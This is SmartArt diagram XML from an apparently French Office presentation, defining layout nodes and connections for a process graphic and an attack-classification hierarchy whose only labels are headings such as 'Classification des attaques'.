    <dgm:pt modelId="{B9267856-9FE7-480C-BB94-192EB506871E}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="dot4" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="15"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2160232D-98F4-4E9E-8088-2669BE775D90}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="dot5" presStyleLbl="alignNode1" presStyleIdx="4" presStyleCnt="15"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7BBF4DCA-081A-4CDE-8A4C-DF39BE680203}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="dot6" presStyleLbl="alignNode1" presStyleIdx="5" presStyleCnt="15"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4E288E09-0D46-460B-8ABE-28BE79C536CF}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="dot7" presStyleLbl="alignNode1" presStyleIdx="6" presStyleCnt="15"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{02936928-A36F-434C-A4F1-A24CD37280CF}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="dot8" presStyleLbl="alignNode1" presStyleIdx="7" presStyleCnt="15"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F8E6382E-CD0A-4B45-B758-818A9E7A8B42}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="dotArrow1" presStyleLbl="alignNode1" presStyleIdx="8" presStyleCnt="15"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{25168A04-ACC0-47CD-9BCF-C1A66AD15D06}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="dotArrow2" presStyleLbl="alignNode1" presStyleIdx="9" presStyleCnt="15"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{73EF8A76-86C0-4616-847B-FA439156B448}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="dotArrow3" presStyleLbl="alignNode1" presStyleIdx="10" presStyleCnt="15"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0AF7785C-7B84-4F40-972B-C623393FE6DC}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="dotArrow4" presStyleLbl="alignNode1" presStyleIdx="11" presStyleCnt="15"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E616B5AF-74ED-4CBD-BC09-BE90F2DA0E02}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="dotArrow5" presStyleLbl="alignNode1" presStyleIdx="12" presStyleCnt="15"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DA96045E-05E5-4D23-9C29-48543C2F76A4}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="dotArrow6" presStyleLbl="alignNode1" presStyleIdx="13" presStyleCnt="15"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{465803F0-B69B-40C8-A4DF-FBA5A0F108DC}" type="pres">
      <dgm:prSet presAssocID="{A30F7228-2889-48D9-ACC0-7A71834A9652}" presName="dotArrow7" presStyleLbl="alignNode1" presStyleIdx="14" presStyleCnt="15"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{147D9CC2-722A-4EA3-9D84-F00EF48FDC0E}" type="pres">
      <dgm:prSet presAssocID="{C6D2924A-1847-46A1-8B4A-03C6D7F052EE}" presName="parTx1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02DD6A58-13A7-4CE6-9444-9DFC7A899BAC}" type="pres">
      <dgm:prSet presAssocID="{6352AB84-3F2F-4408-9943-43AFDA18732A}" presName="picture1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9201ED33-A129-4212-96A1-4E879CB5EF2D}" type="pres">
      <dgm:prSet presAssocID="{6352AB84-3F2F-4408-9943-43AFDA18732A}" presName="imageRepeatNode" presStyleLbl="fgImgPlace1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FA308EC2-7D00-495A-926F-7E2FA0DA3485}" type="pres">
      <dgm:prSet presAssocID="{B1870CC2-3715-40DE-90E3-91650E582566}" presName="parTx2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EC5ADDB4-E64B-4136-A045-2B525F2E71D6}" type="pres">
      <dgm:prSet presAssocID="{8316352A-2AB9-4102-9CE9-A2B7AD1F66E2}" presName="picture2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1346C6A9-DCB3-4C2C-8821-E1BFB21BE577}" type="pres">
      <dgm:prSet presAssocID="{8316352A-2AB9-4102-9CE9-A2B7AD1F66E2}" presName="imageRepeatNode" presStyleLbl="fgImgPlace1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2E0ADA07-14B2-4E21-BB78-1DE7115EEDB9}" type="pres">
      <dgm:prSet presAssocID="{AEAAE3B3-0AFF-4EB3-A44B-85EBB224FBD1}" presName="parTx3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B8C2980D-9FA0-4EA3-8CF9-D7ABF0A409FC}" type="pres">
      <dgm:prSet presAssocID="{396B2409-0B2E-4744-B2D0-4445B719A006}" presName="picture3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1B5A8A9D-0C96-4699-813B-7D305851761A}" type="pres">
      <dgm:prSet presAssocID="{396B2409-0B2E-4744-B2D0-4445B719A006}" presName="imageRepeatNode" presStyleLbl="fgImgPlace1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E14BEE09-C11C-4EBA-B1B4-046B6960C882}" type="pres">
      <dgm:prSet presAssocID="{297B26A6-E4F5-4525-99F1-366C8E8B391D}" presName="parTx4" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{623F3FC6-74A4-4865-8529-9F3ACFFF3512}" type="pres">
      <dgm:prSet presAssocID="{7C66A091-9558-4289-B1C4-D014376C0119}" presName="picture4" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B55830F3-AB6C-4653-A6C3-15950AAC2FF3}" type="pres">
      <dgm:prSet presAssocID="{7C66A091-9558-4289-B1C4-D014376C0119}" presName="imageRepeatNode" presStyleLbl="fgImgPlace1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3A0261E-2F58-40F7-B4FE-AA29BCAC280D}" type="pres">
      <dgm:prSet presAssocID="{607267E5-C31F-423E-A1EC-58ADD6727254}" presName="parTx5" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7760C13-C986-4FFA-BBB2-88C6E5F43A8C}" type="pres">
      <dgm:prSet presAssocID="{124EB4D1-C356-4B39-9202-FC72E2AD83EE}" presName="picture5" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F1F6FB46-46CB-49A4-B6DB-FB323E07C58A}" type="pres">
      <dgm:prSet presAssocID="{124EB4D1-C356-4B39-9202-FC72E2AD83EE}" presName="imageRepeatNode" presStyleLbl="fgImgPlace1" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C7C63546-87A1-4484-9A15-AB7A16E91211}" type="presOf" srcId="{297B26A6-E4F5-4525-99F1-366C8E8B391D}" destId="{E14BEE09-C11C-4EBA-B1B4-046B6960C882}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{74DE5FEE-AAC7-4A39-A285-A1CAA87664C4}" srcId="{A30F7228-2889-48D9-ACC0-7A71834A9652}" destId="{297B26A6-E4F5-4525-99F1-366C8E8B391D}" srcOrd="3" destOrd="0" parTransId="{77D19324-DD00-4354-823A-336DF5EC2429}" sibTransId="{7C66A091-9558-4289-B1C4-D014376C0119}"/>
    <dgm:cxn modelId="{164950FD-4CDA-4984-A8A4-289C33BAC13D}" type="presOf" srcId="{6352AB84-3F2F-4408-9943-43AFDA18732A}" destId="{9201ED33-A129-4212-96A1-4E879CB5EF2D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{173F3EDE-1744-4A1B-8190-56C30561576F}" type="presOf" srcId="{8316352A-2AB9-4102-9CE9-A2B7AD1F66E2}" destId="{1346C6A9-DCB3-4C2C-8821-E1BFB21BE577}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{9691D956-AA13-47E3-A7B5-8403977FCECB}" type="presOf" srcId="{C6D2924A-1847-46A1-8B4A-03C6D7F052EE}" destId="{147D9CC2-722A-4EA3-9D84-F00EF48FDC0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{E4FE4BD0-7A53-4C77-91F9-D39E937BFAD9}" type="presOf" srcId="{607267E5-C31F-423E-A1EC-58ADD6727254}" destId="{A3A0261E-2F58-40F7-B4FE-AA29BCAC280D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{C600DB98-6B96-4581-9478-5A0127AAF9D5}" type="presOf" srcId="{124EB4D1-C356-4B39-9202-FC72E2AD83EE}" destId="{F1F6FB46-46CB-49A4-B6DB-FB323E07C58A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{3154FDC3-B1C8-47FA-8FBD-E24CF1C92E62}" type="presOf" srcId="{396B2409-0B2E-4744-B2D0-4445B719A006}" destId="{1B5A8A9D-0C96-4699-813B-7D305851761A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{B1464D1C-355F-4A57-B919-9317CDEA3427}" srcId="{A30F7228-2889-48D9-ACC0-7A71834A9652}" destId="{AEAAE3B3-0AFF-4EB3-A44B-85EBB224FBD1}" srcOrd="2" destOrd="0" parTransId="{41B7548C-A4DA-4042-9103-344451C70C25}" sibTransId="{396B2409-0B2E-4744-B2D0-4445B719A006}"/>
    <dgm:cxn modelId="{110A1192-8EBA-4B94-B04E-BA48B2175FC1}" type="presOf" srcId="{A30F7228-2889-48D9-ACC0-7A71834A9652}" destId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{4F7C5D33-C222-4EC9-8784-6DC9E42F66E8}" type="presOf" srcId="{7C66A091-9558-4289-B1C4-D014376C0119}" destId="{B55830F3-AB6C-4653-A6C3-15950AAC2FF3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{ED8CC282-C00B-465A-92F3-88485BE41F0E}" type="presOf" srcId="{B1870CC2-3715-40DE-90E3-91650E582566}" destId="{FA308EC2-7D00-495A-926F-7E2FA0DA3485}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{5F6A0A35-9CDE-4DF8-B3F2-942F1C6D40E1}" srcId="{A30F7228-2889-48D9-ACC0-7A71834A9652}" destId="{C6D2924A-1847-46A1-8B4A-03C6D7F052EE}" srcOrd="0" destOrd="0" parTransId="{073FA647-C1D9-410C-879E-127C1A5245A1}" sibTransId="{6352AB84-3F2F-4408-9943-43AFDA18732A}"/>
    <dgm:cxn modelId="{10AA2B72-DB53-4554-B92E-BADFCBEE94A3}" type="presOf" srcId="{AEAAE3B3-0AFF-4EB3-A44B-85EBB224FBD1}" destId="{2E0ADA07-14B2-4E21-BB78-1DE7115EEDB9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{901B448A-5389-4597-BB08-938489875294}" srcId="{A30F7228-2889-48D9-ACC0-7A71834A9652}" destId="{607267E5-C31F-423E-A1EC-58ADD6727254}" srcOrd="4" destOrd="0" parTransId="{7A66AB43-0110-45B4-94A1-84F0188886E7}" sibTransId="{124EB4D1-C356-4B39-9202-FC72E2AD83EE}"/>
    <dgm:cxn modelId="{DEF580C4-43C5-41F6-90F2-9C7401E9C1EF}" srcId="{A30F7228-2889-48D9-ACC0-7A71834A9652}" destId="{B1870CC2-3715-40DE-90E3-91650E582566}" srcOrd="1" destOrd="0" parTransId="{FE8AB162-28D1-49F2-8BC6-A25BF750AB33}" sibTransId="{8316352A-2AB9-4102-9CE9-A2B7AD1F66E2}"/>
    <dgm:cxn modelId="{7EE8F44D-AEEC-4215-8991-228CE7771539}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{6659A5F0-439D-4464-9B15-96B622EDA5A5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{ED28AB0D-6845-4D22-84DD-7A47BB3699F3}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{EF3F40B7-DCAE-410A-B08A-DB239E7B8CEF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{346724B0-6D32-47A6-A79A-D451D4E3DED8}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{F2405C61-1B04-46F1-8F79-76B35B2378D7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{A53FDCAB-B84E-402F-9318-8CDDC5187835}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{B9267856-9FE7-480C-BB94-192EB506871E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{3D8A6CA4-C19B-42FF-9B98-D53221965F81}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{2160232D-98F4-4E9E-8088-2669BE775D90}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{3E7A35E4-61CC-40DB-ACA2-C82A7AF21D42}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{7BBF4DCA-081A-4CDE-8A4C-DF39BE680203}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{D7044B01-5CE8-4E6F-B1E9-DD8345D9E0AD}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{4E288E09-0D46-460B-8ABE-28BE79C536CF}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{EB7B677D-82E9-4203-A921-F40502CCCF35}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{02936928-A36F-434C-A4F1-A24CD37280CF}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{01CF6110-E6A1-4750-B09A-F771DAB70BB7}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{F8E6382E-CD0A-4B45-B758-818A9E7A8B42}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{D332BEAB-F49B-481F-927F-753214AE80F4}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{25168A04-ACC0-47CD-9BCF-C1A66AD15D06}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{D94C9118-A2E1-48A0-883A-0B8216CDE176}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{73EF8A76-86C0-4616-847B-FA439156B448}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{023808CB-5A87-48F6-92E9-481268500619}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{0AF7785C-7B84-4F40-972B-C623393FE6DC}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{219A7464-1266-4EE1-B711-9241C9798514}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{E616B5AF-74ED-4CBD-BC09-BE90F2DA0E02}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{ABFB001B-E2E5-4C05-913E-C45E3B8B3247}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{DA96045E-05E5-4D23-9C29-48543C2F76A4}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{C19DBF2C-4D67-4E33-B7E1-A5FC8AED03A0}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{465803F0-B69B-40C8-A4DF-FBA5A0F108DC}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{8B6D7A47-FEB0-47E2-A4AB-F77183C48F26}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{147D9CC2-722A-4EA3-9D84-F00EF48FDC0E}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{2F8F90F9-9513-4D94-A45C-599D0F09236F}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{02DD6A58-13A7-4CE6-9444-9DFC7A899BAC}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{73FBBEE8-81F0-4FBC-84D4-88221F94A543}" type="presParOf" srcId="{02DD6A58-13A7-4CE6-9444-9DFC7A899BAC}" destId="{9201ED33-A129-4212-96A1-4E879CB5EF2D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{40B8A387-77B6-4AC2-B47C-ED2C17474034}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{FA308EC2-7D00-495A-926F-7E2FA0DA3485}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{4DED70F5-13AE-4421-A7A3-CE25160B0E88}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{EC5ADDB4-E64B-4136-A045-2B525F2E71D6}" srcOrd="18" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{E13E43B0-2AB0-4BD2-BC0B-1B7AC4BE6BD4}" type="presParOf" srcId="{EC5ADDB4-E64B-4136-A045-2B525F2E71D6}" destId="{1346C6A9-DCB3-4C2C-8821-E1BFB21BE577}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{1D2CBAAC-AE48-43AE-B883-D0CCDA7445F1}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{2E0ADA07-14B2-4E21-BB78-1DE7115EEDB9}" srcOrd="19" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{92C86B86-FCE8-43A5-A893-33F044B7D087}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{B8C2980D-9FA0-4EA3-8CF9-D7ABF0A409FC}" srcOrd="20" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{6BE8AC0A-5481-491E-BA4B-33B2B2F7B523}" type="presParOf" srcId="{B8C2980D-9FA0-4EA3-8CF9-D7ABF0A409FC}" destId="{1B5A8A9D-0C96-4699-813B-7D305851761A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{FFC38792-9D6C-4CF1-9A1D-AD7297FF8EDF}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{E14BEE09-C11C-4EBA-B1B4-046B6960C882}" srcOrd="21" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{9D7C05D7-6355-4E93-803B-64E88A9351CA}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{623F3FC6-74A4-4865-8529-9F3ACFFF3512}" srcOrd="22" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{AFE8FB81-E80A-4688-B509-BAA8A5F6B705}" type="presParOf" srcId="{623F3FC6-74A4-4865-8529-9F3ACFFF3512}" destId="{B55830F3-AB6C-4653-A6C3-15950AAC2FF3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{4B902548-3A63-4582-9962-4E79C3DF914C}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{A3A0261E-2F58-40F7-B4FE-AA29BCAC280D}" srcOrd="23" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{3EE90B3C-0310-4FDB-9161-857AC588CC55}" type="presParOf" srcId="{B21B74EE-645E-46B5-878E-7CBDC40863F9}" destId="{A7760C13-C986-4FFA-BBB2-88C6E5F43A8C}" srcOrd="24" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{635A5C5A-A5E7-4A84-8B15-D2CD442FA4C9}" type="presParOf" srcId="{A7760C13-C986-4FFA-BBB2-88C6E5F43A8C}" destId="{F1F6FB46-46CB-49A4-B6DB-FB323E07C58A}"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9C1591-B8F4-455C-9C6F-12A39946245B}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2008/layout/HorizontalMultiLevelHierarchy" loCatId="hierarchy" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful4" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A4ED6A6-9239-48FF-B31E-E66487BDAA11}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Classification des attaques</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{616FDE98-8A96-44DF-8669-58DB78E4DF71}" type="parTrans" cxnId="{911769BF-D097-4844-A320-07FC8BDEC085}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A35C0F11-29F7-45CF-80D6-764D9C3EBE8F}" type="sibTrans" cxnId="{911769BF-D097-4844-A320-07FC8BDEC085}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{345DD546-641F-47FB-8F0B-4F7A5C06BF84}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Selon la localisation de l’attaquant</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB70A082-7152-45C4-87AD-BB6D21FDB0DF}" type="parTrans" cxnId="{F63CC599-FEE6-46AC-B247-BB450266F427}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0254274C-39EC-4E64-A068-ABB3F7AC8FF1}" type="sibTrans" cxnId="{F63CC599-FEE6-46AC-B247-BB450266F427}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F58FD89-9BCF-4061-A9B1-F9B7151A72E2}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            <a:t>Selon la nature de l’attaque</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65F188DC-9F04-4411-BDCB-488D5741332E}" type="parTrans" cxnId="{4B69C92E-182B-49C8-B470-0DEF4AE32AAA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
